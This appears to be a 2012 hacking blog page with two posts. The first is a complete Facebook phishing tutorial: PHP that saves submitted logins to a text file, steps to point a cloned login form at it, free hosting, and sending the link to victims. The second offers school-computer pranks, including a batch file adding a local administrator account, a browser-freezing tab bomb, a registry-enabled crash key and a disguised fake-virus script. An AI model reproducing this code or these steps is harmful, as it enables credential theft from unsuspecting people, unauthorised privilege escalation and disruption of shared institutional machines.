alexa

Player created by Inbound Now - Social Media Tools.

Saturday, July 28, 2012

How to Hack Facebook using Phishing ~ 2012


Note: Phishing is illegal. This tutorial is only for educative purposes.


Facebook Phishing 2012

Well firstly i will be breifing what phishing is for those who are currently unaware of it.
According to Wikipedia, Phishing is attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.

In facebook phishing, the attacker creates a fake page resembling Facebook.com where victims enter their passwords and id's in order to login. By the time the page loads and redirects the victim to the original facebook page, his/her password and id gets saved in the attackers web server.

Now we will go straight into the tutorial segment.
Well we will be actually needing two files in this whole tutorial

1. A php file called login.php. This php file plays the cheif role in extracting and storing the password.
2. Index.html which is the edited fake page and is very similar to the original fb homepage.

Step 1. Creating the php file

Open notepad and  paste the following lines there... and save it with name login.php


<?php
header ('Location: http://www.facebook.com/appcenter');
$handle = fopen("facebook.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Step 2.Creating Index.html Page

Firstly open Facebook.com in your browser. After it loads completely, save it to a folder.


Facebook Phishing 2012

Open the .html\.htm file you just downloaded, using notepad and go to Edit>Find and type in the search box:
method="post" and press Find.


Facebook Phishing 2012

When the searched keyword is shown, notice that just before it, there is something written like: action="www.facebook.............". Replace the text within the quotes with login.php.(See the Image)
Facebook Phishing 2012

Bingo !! Your Phishing page is now ready !

Step 3. Uploading Files to Free Web Hosting

Now you have to upload the above mentioned files in an online web hosting provider.
For this tutorial, I will be using www.000webhost.com.

a. Firstly go to the site and signup for a free account.


000webhost free webhosting

b. After you have created your account, go to Control Panel>File Manager.


file manager

c. Navigate and go to the root folder and delete if you find any pre-existing files.

d. Now click "Upload" and select the two files, namely index.html and login.php

~~ Now you are ready to strike ~~

e. Now copy the link of sub-domain you selected while registering for the hosting account and give it to the victim. Whenever someone tries to login through your phishing page, the username and password is saved in a text file in your file manager(see step b).

Facebook Phishing page

Well I also included a video tutorial for those who are still not very sure about the steps:



How to Hack Facebook using Phishing ~ 2012 - 1080p HD from Siwalik Mukherjee on Vimeo.
0 comments
Read More

Monday, July 9, 2012

5 Fun things To Do on School Computers


SCHOOL COMPUTER PICTURE STUDENT SITTING IN-FRONT OF PC

I know it has been a while after my last article, so sorry guys for that.

Today I will be happy to tell you that my article is all about School computers! Because they're just too easy to hack and do fun stuff with, especially because teachers are just so incompetent with technology sometimes.

1. Be a Javascript Troller

There are so many types of crazy and annoying things you can probably do with Javascript, and all you need in order to do some of these things is just a text editor and a web browser. So, for this script, open up Notepad or something of the like and type the following:

SCHOOL COMPUTER GRAPHICS
<html>
<head>
<title>Lol i troll u</title>
<script type="text/javascript">
function troll() {
alert('Lol i trolled u!');
troll();
}
</script>
</head>
<body onLoad="troll()">
<center>
<img src="http://upload.wikimedia.org/wikipedia/en/7/78/Trollface.svg" />
</center>
</body>
</html>

So what do you do with this code? Save it as trolled.html or anything else as long as it ends with .html and not .txt. Copy it onto someone else's computer when they're not looking (i.e. put it on a USB stick and open it up from there.) Then, quickly leave the vicinity before they look back.
So, what does this code do? Basically, it creates a function called troll() which makes a popup and then does troll() again, and that new troll() makes a popup and calls troll(), and that new troll makes a popup that calls troll()..... It's a never-ending circle. Once you click "ok", a new alert pops up. The only way out is to force-quit the web browser (open up the Task Manager and end a process for Windows, or just force-quit normally for Mac.) As an added bonus, the page has the trollface as a background.

2. Crash a Computer using Flash and Google

Yep, it's actually quite easy to do. Open up a new flash document. Open up the Actions panel for the stage of the first frame. If it's in Actionscript 2, write the following:

onEnterFrame = function ()
{
    getURL("http://www.google.com", "_blank");
}

Or if it's actionscript 3 write the following:

function openGoogle(e:Event):void
{
navigateToURL("http://www.google.com", "_blank");
}
stage.addEventListener(Event.ENTER_FRAME, openGoogle);

Press Control-Enter when you're ready to crash your computer. What this does is repeatedly open up new tabs of Google. But it opens so many Google tabs every second that after maybe 20-30 seconds your computer will barely be able to respond to you mouse clicks or even mouse movements. Usually, any attempt to stop it will result in processing overload and cause the computer to freeze. The only real way to stop this is to force-quit BOTH flash.exe and iexplorer.exe. Some teachers may know enough to do this, but might accidentally close explorer.exe

3. Promote your Account

Want to be an administrator? No big deal. Open up Notepad. Type in the following:

@echo off
net user USERNAME PASSWORD /add
goto admin

:admin
@echo off
net localgroup administrators USERNAME /add
pause


Although, you have to replace USERNAME with whatever your username is and PASSWORD with a password. Save the file as n00b.bat or as anything else .bat and NOT .txt. Navigate to the directory where you saved the file, and double-click it to run it. Once that's done, log out, then log back in again. You're now an admin for that specific machine!
Note: This may or may not work if they have disabled the command prompt. If they have, sorry folks, but you're out of luck for this one. You can still become an admin by using various software if you're really desperate.

4. Do Something Neat with the Scroll-Lock Key

It's usually useless... UNTIL NOW! Note: This only works on XP machines.

1.   Start > Run. Type in "regedit" and click "OK".
2.   Go to KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters by using the dropdowns in the sidebar.
3.   Edit > New > DWORD Value. Set the name to CrashOnCtrlScroll.
4.   Right-click on this newly created value and click on Modify
5.   Enter the number 1 in the Value data field and click on OK.
6.   Close regedit and reboot your system.
7.   Now you can blue screen (crash) your system by holding the right CTRL key and pressing "Scroll Lock" twice. It's bluescreeneriffic!

5. Write a Virus that Doesn't Do Anything but Scares Your Friends

Open notepad. Type this:

@echo off
echo OMFG YOU GOT A VIRUS.
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo It will now begin to delete your files.
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo Do you want to abort the deletion of your files?
pause
echo Wow you really fell for that. Pressing a key made the virus delete your account.
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo deleting.......
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo YOU'VE BEEN FOOLED. THERE IS NO VIRUS. YOU'RE JUST A TROLLED F***.
pause

Save this as cool_game.bat or anything else that ends in .bat and sounds like it's NOT a virus. This way, you can give a friend the file, and make them run it and then scare them silly. It's pretty entertaining.

Warning !!!

Seriously, don't do these if someone is watching. They may be fun, but it's easy for someone to monitor your account. If they catch you, well, then you're screwed.

0 comments
Read More
Powered by Blogger.